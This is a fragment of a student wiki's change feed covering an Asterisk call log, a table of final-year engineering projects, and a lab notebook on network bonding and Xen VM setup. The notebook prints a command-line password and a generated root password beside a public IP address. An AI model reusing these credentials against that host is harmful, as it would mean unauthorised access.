 [Jan  6 16:12:14] NOTICE[3824]: chan_sip.c:27870 handle_request_subscribe: Received SIP subscribe for peer without mailbox: 665&lt;br /&gt;
   == Using SIP RTP CoS mark 5&lt;br /&gt;
     -- Executing [666@work:1] Dial(&amp;quot;SIP/665-00000000&amp;quot;, &amp;quot;SIP/666,20&amp;quot;) in new stack&lt;br /&gt;
   == Using SIP RTP CoS mark 5&lt;br /&gt;
     -- Called SIP/666&lt;br /&gt;
     -- SIP/666-00000001 is ringing&lt;br /&gt;
     -- SIP/666-00000001 answered SIP/665-00000000&lt;br /&gt;
     -- Remotely bridging SIP/665-00000000 and SIP/666-00000001&lt;br /&gt;
   == Spawn extension (work, 666, 1) exited non-zero on 'SIP/665-00000000'&lt;br /&gt;
 Frotteman*CLI&amp;gt;&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Projets_IMA5_2016/2017&amp;diff=35983</id>
		<title>Projets IMA5 2016/2017</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Projets_IMA5_2016/2017&amp;diff=35983"/>
				<updated>2016-12-13T10:30:50Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* Répartition des binômes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Merci de référencer vos pages de projets ici. Merci aussi d'uniformiser vos formats que ce soit en regardant la présentation des projets déjà créés ou en allant modifier le format des précédents si votre façon de faire vous semble la meilleure. Dans tous les cas un minimum de communication entre les binômes est conseillée.&lt;br /&gt;
&lt;br /&gt;
Toutes les sources doivent être déposées sur notre archive GIT. Le service est disponible à l'URL [https://archives.plil.fr archives.plil.fr]. Connectez-vous avec vos identifiants Polytech'Lille. Sauf indication contraire de vos encadrants, rendez le projet public et mettez le lien sur votre Wiki. Vous pouvez trouver de la documentation sur ce système d'archives sur ce [https://git-scm.com/book/fr/v1 site].&lt;br /&gt;
&lt;br /&gt;
== Répartition des binômes ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Elèves&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Encadrant Ecole&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapport décembre&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Rapports finaux&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Vidéo&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P1 Automatisation de tests de validation d'un logiciel embarqué]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas ROJ / Maxime SZWECHOWIEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole)&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P3 Chaise vibrante pour enfant sourd]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Geoffrey Piekacz &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Rodolphe Astori / Alexandre Boé / Thomas Vantroys &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P7 Régulation temps réel sur réseau sans fil ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Morgan OBEISSART / Vincent ROBIC &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alexandre BOE / Thomas VANTROYS &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P14 Conversion DC-DC à liaison AC et circuit L-C-L]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Nicolas WEGRZYN&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;Philippe DELARUE&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Fichier:Rapport_intermédiaire_PFE_Wegrzyn_Nicolas.pdf]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P15 Entreprise : Développement d'une application iOS et Android ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Loïc DELECROIX / Julien JOIGNAUX &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / Béatrice CADET (entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P16 Réaliser deux trackers GPS permettant de suivre à distance le trajet d'un coureur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Valentin Taffin / Alexandre Cuadros &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P19 Relai Ethernet Lora ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cong CHEN / Sonia NDUWAYO &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P20 Conception d'un périphérique USB de type &amp;quot;gadget&amp;quot;]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Florian Giovannangeli &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Xavier Redon (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P23 Poste ébavurage de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Corentin CASIER / Jordan RAZAFINDRAIBE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P24 Contrôle qualité de la production de pièces plastiques  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alex JULITA / Matthier HERWEGH &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise Conrard (Ecole) / L. HAAG (Entreprise) / R. DAVID (Entreprise) / B. MASSART (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;[[P25 Supervision calculateur embarqué sur camion  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Alexandre DESCAMD / Pierre MICHEL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / R. DAVID (Entreprise) / JF. DUHAUTOIS (Entreprise)  &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P31 Partition HTTP/TLS pour Pepin]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Mageshwaran SEKAR &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julien IGUCHI-CARTIGNY&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; [[Fichier:Rapport mi-projet SEKAR.pdf]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P39 Ajouter de nouvelles interactions à la solution Tezeos  ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Nathan RICHEZ &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Samuel Tranchet (Entreprise) / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P42 Dispositif à retour tactile ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Pierre FITOUSSI &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Laurent GRISONI &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P44 Identification d'un robot mobile ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Michel MIKHAEL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Midzodzi PEKPE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P47 Développement d'une interface cerveau-ordinateur ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Victor CHARNET &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; C. Lecocq (Ecole) F. Cabestaing (Labo) A. Duprès (Labo)&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; [[Fichier:Rapport_Decembre_BCI_Charnet.pdf]] &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P52 Application mobile musicale]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julien Bielle/Romain Ruet &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt;[[P54 Robot assisté par vision pour le tri de pièces métalliques]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Julian BONVILLE &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Rochdi MERZOUKI (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P56 Robot testeur de club de golf]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Joshua LETELLIER &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Rochdi MERZOUKI (Ecole) / Guillaume DEWAELE (Entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P57 Robotisation d'un poste de production de pièces à base de fil métallique ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Audrey AFFOYON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Blaise CONRARD (Ecole) / Laurent HAAG (Projet CENTAURE) / Antoine HONORE (Entreprise) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P59 Popsell : application mobile]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Quentin GRUSON &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas VANTROYS (Ecole) / François Vandeplanque (Popsell) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[P61 Jeux d'aventure grandeur nature ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; MAIA Stéphane / LENTIEUL Romuald &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; GAPAS / Thomas Vantroys (Ecole) &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
 &amp;lt;td&amp;gt;[[P64  Sécurité de l'IOT ]]&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Cédric DUVAL &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; Thomas Vantroys (Ecole) / Alexandre Boé (Ecole)&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;[[Fichier:Rapport P64 Cédric DUVAL.pdf]] &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Matériel nécessaires ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Projet&amp;lt;/th&amp;gt;&lt;br /&gt;
  &amp;lt;th&amp;gt;Matériel&amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;P15&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt; 2 téléphones Android (reçus le 30 septembre. Une boite complète + 1 boite sans câble de connexion) &amp;lt;/span&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;P16&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt; Arduino MegaADK &amp;lt;/span&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;P52&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt; 2 téléphones Android (reçus le 5 octobre. Deux boites complètes) &amp;lt;/span&amp;gt; &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;P61&amp;lt;/td&amp;gt;&lt;br /&gt;
  &amp;lt;td&amp;gt;&amp;lt;span style=&amp;quot;color:green&amp;quot;&amp;gt; une tablette Android reçu le 10/10/2016 &amp;lt;br&amp;gt; 1 Raspberry pi (+dongle Wifi) reçu le 10/10/2016&amp;lt;/span&amp;gt;&lt;br /&gt;
  &amp;lt;br&amp;gt;&amp;lt;span style=&amp;quot;color:orange&amp;quot;&amp;gt; 9 Raspberry pi (+dongle Wifi) &amp;lt;br&amp;gt; 8 Haut-Parleurs simples &amp;lt;br&amp;gt; 8 clés Bluetooth&amp;lt;/span&amp;gt;&amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Rapport_P64_C%C3%A9dric_DUVAL.pdf&amp;diff=35982</id>
		<title>Fichier:Rapport P64 Cédric DUVAL.pdf</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Fichier:Rapport_P64_C%C3%A9dric_DUVAL.pdf&amp;diff=35982"/>
				<updated>2016-12-13T10:29:35Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Cduval</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35898</id>
		<title>Cahier 2016 groupe n°1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=Cahier_2016_groupe_n%C2%B01&amp;diff=35898"/>
				<updated>2016-12-12T10:11:05Z</updated>
		
		<summary type="html">&lt;p&gt;Cduval : /* 6.6 Securasition Wifi par WPA2-EAP */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Séance 1=&lt;br /&gt;
&lt;br /&gt;
Pour la première séance nous avons installé ifenslave 2.6 sur le serveur et ajout d'un alias pour que le module bond soit activé avec les bonnes options :&lt;br /&gt;
&lt;br /&gt;
 alias bond0 bonding&lt;br /&gt;
 options bonding mode=1 miimon=100 downdelay=200 updelay=200&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi configuré le fichier /etc/network/interfaces&lt;br /&gt;
en y incluant la configuration des différentes interfaces : eth100, eth101 ainsi que la configuration du bridge: br0 et du bonding: bond0.&lt;br /&gt;
&lt;br /&gt;
 #Bonding IMA5sc&lt;br /&gt;
 #auto eth100&lt;br /&gt;
 #iface eth0 inet manual&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto eth101&lt;br /&gt;
 #iface eth1 inet manual	&lt;br /&gt;
 #	bond-master bond0&lt;br /&gt;
 #	bond-primary eth100 eth101&lt;br /&gt;
 #	bond-mode 5&lt;br /&gt;
 &lt;br /&gt;
 #auto bond0&lt;br /&gt;
 #iface bond0 inet dhcp&lt;br /&gt;
 #	pre-up modprobe bonding&lt;br /&gt;
 #	pre-up ifconfig bond0 up&lt;br /&gt;
 #	pre-up /sbin/ifenslave  bond0 eth100 eth101&lt;br /&gt;
 #	down sbin/ifenslave -d bond0 eth100 eth101&lt;br /&gt;
 #	bonds-slaves none&lt;br /&gt;
 #&lt;br /&gt;
 #auto br0&lt;br /&gt;
 #iface br0 inet dhcp&lt;br /&gt;
 #	bridge-ports bond0&lt;br /&gt;
&lt;br /&gt;
=Séance 2=&lt;br /&gt;
&lt;br /&gt;
Installation de la machine virtuelle sur le serveur cordouan:&lt;br /&gt;
&lt;br /&gt;
 root@cordouan:/usr/local/xen/domains# xen-create-image --hostname=Frotteman --ip=193.48.57.161 --netmask=255.255.255.240 --gateway=193.48.57.171  --dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --password=glopglop&lt;br /&gt;
&lt;br /&gt;
 WARNING&lt;br /&gt;
 -------&lt;br /&gt;
 &lt;br /&gt;
  You appear to have a missing vif-script, or network-script, in the&lt;br /&gt;
  Xen configuration file /etc/xen/xend-config.sxp.&lt;br /&gt;
 &lt;br /&gt;
  Please fix this and restart Xend, or your guests will not be able&lt;br /&gt;
 to use any networking!&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 General Information&lt;br /&gt;
 --------------------&lt;br /&gt;
 Hostname       :  Frotteman&lt;br /&gt;
 Distribution   :  jessie&lt;br /&gt;
 Mirror         :  http://debian.polytech-lille.fr/debian/&lt;br /&gt;
 Partitions     :  swap            128M  (swap)&lt;br /&gt;
                   /               4G    (ext3)&lt;br /&gt;
 Image type     :  sparse&lt;br /&gt;
 Memory size    :  128M&lt;br /&gt;
 Kernel path    :  /boot/vmlinuz-3.14-2-amd64&lt;br /&gt;
 Initrd path    :  /boot/initrd.img-3.14-2-amd64&lt;br /&gt;
 &lt;br /&gt;
 Networking Information&lt;br /&gt;
 ----------------------&lt;br /&gt;
 IP Address 1   : 193.48.57.161 [MAC: 00:16:3E:F4:F8:CE]&lt;br /&gt;
 Netmask        : 255.255.255.240&lt;br /&gt;
 Gateway        : 193.48.57.171&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating swap on /usr/local/xen/domains/Frotteman/swap.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating partition image: /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Creating ext3 filesystem on /usr/local/xen/domains/Frotteman/disk.img&lt;br /&gt;
 Done&lt;br /&gt;
 Installation method: debootstrap&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 Running hooks&lt;br /&gt;
 Done&lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping &lt;br /&gt;
 &lt;br /&gt;
 Creating Xen configuration file&lt;br /&gt;
 Done &lt;br /&gt;
 &lt;br /&gt;
 No role scripts were specified.  Skipping&lt;br /&gt;
 Setting up root password&lt;br /&gt;
 Generating a password for the new guest.&lt;br /&gt;
 All done&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 Logfile produced at:&lt;br /&gt;
 	 /var/log/xen-tools/Frotteman.log&lt;br /&gt;
 &lt;br /&gt;
 Installation Summary&lt;br /&gt;
 ---------------------&lt;br /&gt;
 Hostname        :  Frotteman&lt;br /&gt;
 Distribution    :  jessie&lt;br /&gt;
 MAC Address     :  00:16:3E:F4:F8:CE&lt;br /&gt;
 IP Address(es)  :  193.48.57.161 &lt;br /&gt;
 RSA Fingerprint :  37:3f:a5:4a:6d:05:15:3d:55:44:e3:0b:7f:81:91:a2&lt;br /&gt;
 Root Password   :  fsBsiSE4&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Séance3=&lt;br /&gt;
&lt;br /&gt;
Création des partitions logiques pour la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
